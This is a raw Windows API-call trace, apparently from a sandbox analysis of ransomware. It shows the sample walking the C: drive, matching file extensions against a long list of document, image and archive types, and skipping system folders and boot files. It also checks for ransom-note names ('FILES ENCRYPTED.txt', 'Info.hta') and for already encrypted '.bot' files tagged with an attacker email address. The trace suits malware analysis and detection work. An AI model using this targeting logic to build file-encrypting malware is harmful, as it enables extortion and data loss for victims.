	[0171.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF") returned 63
	[0171.618] lstrlenW (lpString=".1cd") returned 4
	[0171.618] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF") returned 63
	[0171.618] lstrlenW (lpString=".jpg") returned 4
	[0171.618] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF") returned 63
	[0171.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF") returned 63
	[0171.618] lstrlenW (lpString=".doc") returned 4
	[0171.618] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.618] lstrlenW (lpString=".docx") returned 5
	[0171.618] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0171.618] lstrlenW (lpString=".pdf") returned 4
	[0171.618] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.618] lstrlenW (lpString=".xls") returned 4
	[0171.618] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.618] lstrlenW (lpString=".xlsx") returned 5
	[0171.618] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0171.618] lstrlenW (lpString=".ppt") returned 4
	[0171.618] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF") returned 63
	[0171.618] lstrlenW (lpString=".zip") returned 4
	[0171.618] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.618] lstrlenW (lpString=".rar") returned 4
	[0171.618] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.619] lstrlenW (lpString=".bz2") returned 4
	[0171.619] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.619] lstrlenW (lpString=".7z") returned 3
	[0171.619] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF") returned 63
	[0171.619] lstrlenW (lpString=".dbf") returned 4
	[0171.619] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF") returned 63
	[0171.619] lstrlenW (lpString=".1cd") returned 4
	[0171.619] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185800.WMF") returned 63
	[0171.619] lstrlenW (lpString=".jpg") returned 4
	[0171.619] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.619] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.619] lstrlenW (lpString="J0187815.WMF") returned 12
	[0171.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187815.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187815.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.714] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=5376) returned 1
	[0171.714] CloseHandle (hObject=0x388) returned 1
	[0171.714] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187815.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187815.wmf")) 

Thread:
	id = 59
	os_tid = 0x778

	[0137.424] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0x9fd0088
	[0137.424] lstrlenW (lpString="C:") returned 2
	[0137.424] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0xa7cfd00 | out: lpFindFileData=0xa7cfd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x7baff30
	[0137.425] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15
	[0137.425] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1
	[0137.425] lstrlenW (lpString="$Recycle.Bin") returned 12
	[0137.425] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1
	[0137.425] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0x9fe0090
	[0137.425] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15
	[0137.426] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0xa7cfa84 | out: lpFindFileData=0xa7cfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7baff70
	[0137.426] FindNextFileW (in: hFindFile=0x7baff70, lpFindFileData=0xa7cfa84 | out: lpFindFileData=0xa7cfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0137.426] FindNextFileW (in: hFindFile=0x7baff70, lpFindFileData=0xa7cfa84 | out: lpFindFileData=0xa7cfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b18ec80, ftLastAccessTime.dwHighDateTime=0x1d58eee, ftLastWriteTime.dwLowDateTime=0x2b18ec80, ftLastWriteTime.dwHighDateTime=0x1d58eee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1
	[0137.426] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62
	[0137.426] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1
	[0137.426] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46
	[0137.426] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1
	[0137.426] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0x9ff0098
	[0137.427] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62
	[0137.427] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0xa7cf808 | out: lpFindFileData=0xa7cf808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b18ec80, ftLastAccessTime.dwHighDateTime=0x1d58eee, ftLastWriteTime.dwLowDateTime=0x2b18ec80, ftLastWriteTime.dwHighDateTime=0x1d58eee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7b66af0
	[0137.427] FindNextFileW (in: hFindFile=0x7b66af0, lpFindFileData=0xa7cf808 | out: lpFindFileData=0xa7cf808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b18ec80, ftLastAccessTime.dwHighDateTime=0x1d58eee, ftLastWriteTime.dwLowDateTime=0x2b18ec80, ftLastWriteTime.dwHighDateTime=0x1d58eee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0137.427] FindNextFileW (in: hFindFile=0x7b66af0, lpFindFileData=0xa7cf808 | out: lpFindFileData=0xa7cf808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2b18ec80, ftCreationTime.dwHighDateTime=0x1d58eee, ftLastAccessTime.dwLowDateTime=0x2b18ec80, ftLastAccessTime.dwHighDateTime=0x1d58eee, ftLastWriteTime.dwLowDateTime=0x2b18ec80, ftLastWriteTime.dwHighDateTime=0x1d58eee, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0137.427] lstrlenW (lpString="desktop.ini") returned 11
	[0137.427] lstrlenW (lpString=".1cd") returned 4
	[0137.427] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1
	[0137.427] lstrlenW (lpString=".3ds") returned 4
	[0137.427] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1
	[0137.427] lstrlenW (lpString=".3fr") returned 4
	[0137.427] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1
	[0137.427] lstrlenW (lpString=".3g2") returned 4
	[0137.427] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1
	[0137.427] lstrlenW (lpString=".3gp") returned 4
	[0137.427] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1
	[0137.427] lstrlenW (lpString=".7z") returned 3
	[0137.427] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1
	[0137.427] lstrlenW (lpString=".accda") returned 6
	[0137.427] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1
	[0137.427] lstrlenW (lpString=".accdb") returned 6
	[0137.427] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1
	[0137.428] lstrlenW (lpString=".accdc") returned 6
	[0137.428] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1
	[0137.428] lstrlenW (lpString=".accde") returned 6
	[0137.428] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1
	[0137.428] lstrlenW (lpString=".accdt") returned 6
	[0137.428] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1
	[0137.428] lstrlenW (lpString=".accdw") returned 6
	[0137.428] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1
	[0137.428] lstrlenW (lpString=".adb") returned 4
	[0137.428] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1
	[0137.428] lstrlenW (lpString=".adp") returned 4
	[0137.428] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1
	[0137.428] lstrlenW (lpString=".ai") returned 3
	[0137.428] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1
	[0137.428] lstrlenW (lpString=".ai3") returned 4
	[0137.428] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1
	[0137.428] lstrlenW (lpString=".ai4") returned 4
	[0137.428] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1
	[0137.428] lstrlenW (lpString=".ai5") returned 4
	[0137.428] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1
	[0137.428] lstrlenW (lpString=".ai6") returned 4
	[0137.428] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1
	[0137.428] lstrlenW (lpString=".ai7") returned 4
	[0137.428] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1
	[0137.429] lstrlenW (lpString=".ai8") returned 4
	[0137.429] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1
	[0137.429] lstrlenW (lpString=".anim") returned 5
	[0137.429] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1
	[0137.429] lstrlenW (lpString=".arw") returned 4
	[0137.429] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1
	[0137.429] lstrlenW (lpString=".as") returned 3
	[0137.429] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1
	[0137.429] lstrlenW (lpString=".asa") returned 4
	[0137.429] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1
	[0137.429] lstrlenW (lpString=".asc") returned 4
	[0137.429] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1
	[0137.429] lstrlenW (lpString=".ascx") returned 5
	[0137.429] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1
	[0137.429] lstrlenW (lpString=".asm") returned 4
	[0137.429] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1
	[0137.429] lstrlenW (lpString=".asmx") returned 5
	[0137.429] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1
	[0137.429] lstrlenW (lpString=".asp") returned 4
	[0137.429] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1
	[0137.429] lstrlenW (lpString=".aspx") returned 5
	[0137.429] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1
	[0137.429] lstrlenW (lpString=".asr") returned 4
	[0137.429] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1
	[0137.429] lstrlenW (lpString=".asx") returned 4
	[0137.429] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1
	[0137.429] lstrlenW (lpString=".avi") returned 4
	[0137.429] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1
	[0137.429] lstrlenW (lpString=".avs") returned 4
	[0137.429] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1
	[0137.429] lstrlenW (lpString=".backup") returned 7
	[0137.429] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1
	[0137.429] lstrlenW (lpString=".bak") returned 4
	[0137.429] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1
	[0137.429] lstrlenW (lpString=".bay") returned 4
	[0137.430] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1
	[0137.430] lstrlenW (lpString=".bd") returned 3
	[0137.430] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1
	[0137.430] lstrlenW (lpString=".bin") returned 4
	[0137.430] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1
	[0137.430] lstrlenW (lpString=".bmp") returned 4
	[0137.430] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1
	[0137.430] lstrlenW (lpString=".bz2") returned 4
	[0137.430] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1
	[0137.430] lstrlenW (lpString=".c") returned 2
	[0137.430] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1
	[0137.430] lstrlenW (lpString=".cdr") returned 4
	[0137.430] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1
	[0137.430] lstrlenW (lpString=".cer") returned 4
	[0137.430] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1
	[0137.430] lstrlenW (lpString=".cf") returned 3
	[0137.430] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1
	[0137.430] lstrlenW (lpString=".cfc") returned 4
	[0137.430] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1
	[0137.430] lstrlenW (lpString=".cfm") returned 4
	[0137.430] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1
	[0137.430] lstrlenW (lpString=".cfml") returned 5
	[0137.430] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1
	[0137.430] lstrlenW (lpString=".cfu") returned 4
	[0137.430] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1
	[0137.430] lstrlenW (lpString=".chm") returned 4
	[0137.430] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1
	[0137.430] lstrlenW (lpString=".cin") returned 4
	[0137.430] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1
	[0137.430] lstrlenW (lpString=".class") returned 6
	[0137.430] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1
	[0137.430] lstrlenW (lpString=".clx") returned 4
	[0137.430] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1
	[0137.430] lstrlenW (lpString=".config") returned 7
	[0137.430] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1
	[0137.431] lstrlenW (lpString=".cpp") returned 4
	[0137.431] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1
	[0137.431] lstrlenW (lpString=".cr2") returned 4
	[0137.431] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1
	[0137.431] lstrlenW (lpString=".crt") returned 4
	[0137.431] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1
	[0137.431] lstrlenW (lpString=".crw") returned 4
	[0137.431] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1
	[0137.431] lstrlenW (lpString=".cs") returned 3
	[0137.431] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1
	[0137.431] lstrlenW (lpString=".css") returned 4
	[0137.431] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1
	[0137.431] lstrlenW (lpString=".csv") returned 4
	[0137.431] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1
	[0137.431] lstrlenW (lpString=".cub") returned 4
	[0137.431] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1
	[0137.431] lstrlenW (lpString=".dae") returned 4
	[0137.431] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1
	[0137.431] lstrlenW (lpString=".dat") returned 4
	[0137.431] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1
	[0137.431] lstrlenW (lpString=".db") returned 3
	[0137.431] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1
	[0137.431] lstrlenW (lpString=".dbf") returned 4
	[0137.431] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1
	[0137.431] lstrlenW (lpString=".dbx") returned 4
	[0137.431] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1
	[0137.431] lstrlenW (lpString=".dc3") returned 4
	[0137.431] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1
	[0137.431] lstrlenW (lpString=".dcm") returned 4
	[0137.431] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1
	[0137.431] lstrlenW (lpString=".dcr") returned 4
	[0137.431] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1
	[0137.431] lstrlenW (lpString=".der") returned 4
	[0137.431] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1
	[0137.431] lstrlenW (lpString=".dib") returned 4
	[0137.431] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1
	[0137.432] lstrlenW (lpString=".dic") returned 4
	[0137.432] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1
	[0137.432] lstrlenW (lpString=".dif") returned 4
	[0137.432] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1
	[0137.432] lstrlenW (lpString=".divx") returned 5
	[0137.432] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1
	[0137.432] lstrlenW (lpString=".djvu") returned 5
	[0137.432] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1
	[0137.432] lstrlenW (lpString=".dng") returned 4
	[0137.432] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1
	[0137.432] lstrlenW (lpString=".doc") returned 4
	[0137.432] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1
	[0137.432] lstrlenW (lpString=".docm") returned 5
	[0137.432] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1
	[0137.432] lstrlenW (lpString=".docx") returned 5
	[0137.432] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1
	[0137.432] lstrlenW (lpString=".dot") returned 4
	[0137.432] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1
	[0137.432] lstrlenW (lpString=".dotm") returned 5
	[0137.432] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1
	[0137.432] lstrlenW (lpString=".dotx") returned 5
	[0137.432] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1
	[0137.432] lstrlenW (lpString=".dpx") returned 4
	[0137.432] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1
	[0137.432] lstrlenW (lpString=".dqy") returned 4
	[0137.432] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1
	[0137.432] lstrlenW (lpString=".dsn") returned 4
	[0137.432] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1
	[0137.432] lstrlenW (lpString=".dt") returned 3
	[0137.432] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1
	[0137.432] lstrlenW (lpString=".dtd") returned 4
	[0137.432] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1
	[0137.432] lstrlenW (lpString=".dwg") returned 4
	[0137.432] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1
	[0137.432] lstrlenW (lpString=".dwt") returned 4
	[0137.432] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1
	[0137.433] lstrlenW (lpString=".dx") returned 3
	[0137.433] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1
	[0137.433] lstrlenW (lpString=".dxf") returned 4
	[0137.433] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1
	[0137.433] lstrlenW (lpString=".edml") returned 5
	[0137.433] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1
	[0137.433] lstrlenW (lpString=".efd") returned 4
	[0137.433] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1
	[0137.433] lstrlenW (lpString=".elf") returned 4
	[0137.433] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1
	[0137.433] lstrlenW (lpString=".emf") returned 4
	[0137.433] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1
	[0137.433] lstrlenW (lpString=".emz") returned 4
	[0137.433] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1
	[0137.433] lstrlenW (lpString=".epf") returned 4
	[0137.433] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1
	[0137.433] lstrlenW (lpString=".eps") returned 4
	[0137.433] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1
	[0137.433] lstrlenW (lpString=".epsf") returned 5
	[0137.433] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1
	[0137.433] lstrlenW (lpString=".epsp") returned 5
	[0137.433] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1
	[0137.433] lstrlenW (lpString=".erf") returned 4
	[0137.433] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1
	[0137.433] lstrlenW (lpString=".exr") returned 4
	[0137.433] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1
	[0137.433] lstrlenW (lpString=".f4v") returned 4
	[0137.433] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1
	[0137.433] lstrlenW (lpString=".fido") returned 5
	[0137.433] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1
	[0137.433] lstrlenW (lpString=".flm") returned 4
	[0137.433] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1
	[0137.433] lstrlenW (lpString=".flv") returned 4
	[0137.433] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1
	[0137.433] lstrlenW (lpString=".frm") returned 4
	[0137.434] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1
	[0137.434] lstrlenW (lpString=".fxg") returned 4
	[0137.434] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1
	[0137.434] lstrlenW (lpString=".geo") returned 4
	[0137.434] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1
	[0137.434] lstrlenW (lpString=".gif") returned 4
	[0137.434] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1
	[0137.434] lstrlenW (lpString=".grs") returned 4
	[0137.434] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1
	[0137.434] lstrlenW (lpString=".gz") returned 3
	[0137.434] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1
	[0137.434] lstrlenW (lpString=".h") returned 2
	[0137.434] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1
	[0137.434] lstrlenW (lpString=".hdr") returned 4
	[0137.434] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1
	[0137.434] lstrlenW (lpString=".hpp") returned 4
	[0137.434] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1
	[0137.434] lstrlenW (lpString=".hta") returned 4
	[0137.434] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1
	[0137.434] lstrlenW (lpString=".htc") returned 4
	[0137.434] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1
	[0137.434] lstrlenW (lpString=".htm") returned 4
	[0137.434] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1
	[0137.434] lstrlenW (lpString=".html") returned 5
	[0137.434] lstrcmpiW (lpString1=".html", lpString2="p.ini") returned -1
	[0137.434] lstrlenW (lpString=".icb") returned 4
	[0137.434] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1
	[0137.434] lstrlenW (lpString=".ics") returned 4
	[0137.434] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1
	[0137.434] lstrlenW (lpString=".iff") returned 4
	[0137.434] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1
	[0137.434] lstrlenW (lpString=".inc") returned 4
	[0137.434] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1
	[0137.434] lstrlenW (lpString=".indd") returned 5
	[0137.434] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1
	[0137.434] lstrlenW (lpString=".ini") returned 4
	[0137.435] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0
	[0137.435] lstrlenW (lpString="desktop.ini") returned 11
	[0137.435] lstrlenW (lpString=".bot") returned 4
	[0137.435] lstrcmpiW (lpString1=".bot", lpString2=".ini") returned -1
	[0137.435] lstrlenW (lpString="desktop.ini") returned 11
	[0137.435] lstrcmpiW (lpString1="boot.ini", lpString2="desktop.ini") returned -1
	[0137.435] lstrcmpiW (lpString1="bootfont.bin", lpString2="desktop.ini") returned -1
	[0137.435] lstrcmpiW (lpString1="ntldr", lpString2="desktop.ini") returned 1
	[0137.435] lstrcmpiW (lpString1="ntdetect.com", lpString2="desktop.ini") returned 1
	[0137.435] lstrcmpiW (lpString1="io.sys", lpString2="desktop.ini") returned 1
	[0137.435] lstrcmpiW (lpString1="FILES ENCRYPTED.txt", lpString2="desktop.ini") returned 1
	[0137.435] lstrcmpiW (lpString1="Info.hta", lpString2="desktop.ini") returned 1
	[0137.435] lstrcmpiW (lpString1="gjfkyfli", lpString2="desktop.ini") returned 1
	[0137.435] lstrcmpiW (lpString1=".exe", lpString2="desktop.ini") returned -1
	[0137.435] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74
	[0137.435] FindNextFileW (in: hFindFile=0x7b66af0, lpFindFileData=0xa7cf808 | out: lpFindFileData=0xa7cf808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf2c790c0, ftCreationTime.dwHighDateTime=0x1d58eed, ftLastAccessTime.dwLowDateTime=0xf2c790c0, ftLastAccessTime.dwHighDateTime=0x1d58eed, ftLastWriteTime.dwLowDateTime=0xf2d5d900, ftLastWriteTime.dwHighDateTime=0x1d58eed, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.id-9C354B42.[admin@sectex.net].bot", cAlternateFileName="DESKTO~1.BOT")) returned 1
	[0137.435] lstrlenW (lpString="desktop.ini.id-9C354B42.[admin@sectex.net].bot") returned 46
	[0137.435] lstrlenW (lpString=".1cd") returned 4
	[0137.435] lstrcmpiW (lpString1=".1cd", lpString2=".bot") returned -1
	[0137.435] lstrlenW (lpString=".3ds") returned 4
	[0137.435] lstrcmpiW (lpString1=".3ds", lpString2=".bot") returned -1
	[0137.435] lstrlenW (lpString=".3fr") returned 4
	[0137.435] lstrcmpiW (lpString1=".3fr", lpString2=".bot") returned -1
	[0137.435] lstrlenW (lpString=".3g2") returned 4
	[0137.435] lstrcmpiW (lpString1=".3g2", lpString2=".bot") returned -1
	[0137.435] lstrlenW (lpString=".3gp") returned 4
	[0137.435] lstrcmpiW (lpString1=".3gp", lpString2=".bot") returned -1
	[0137.435] lstrlenW (lpString=".7z") returned 3
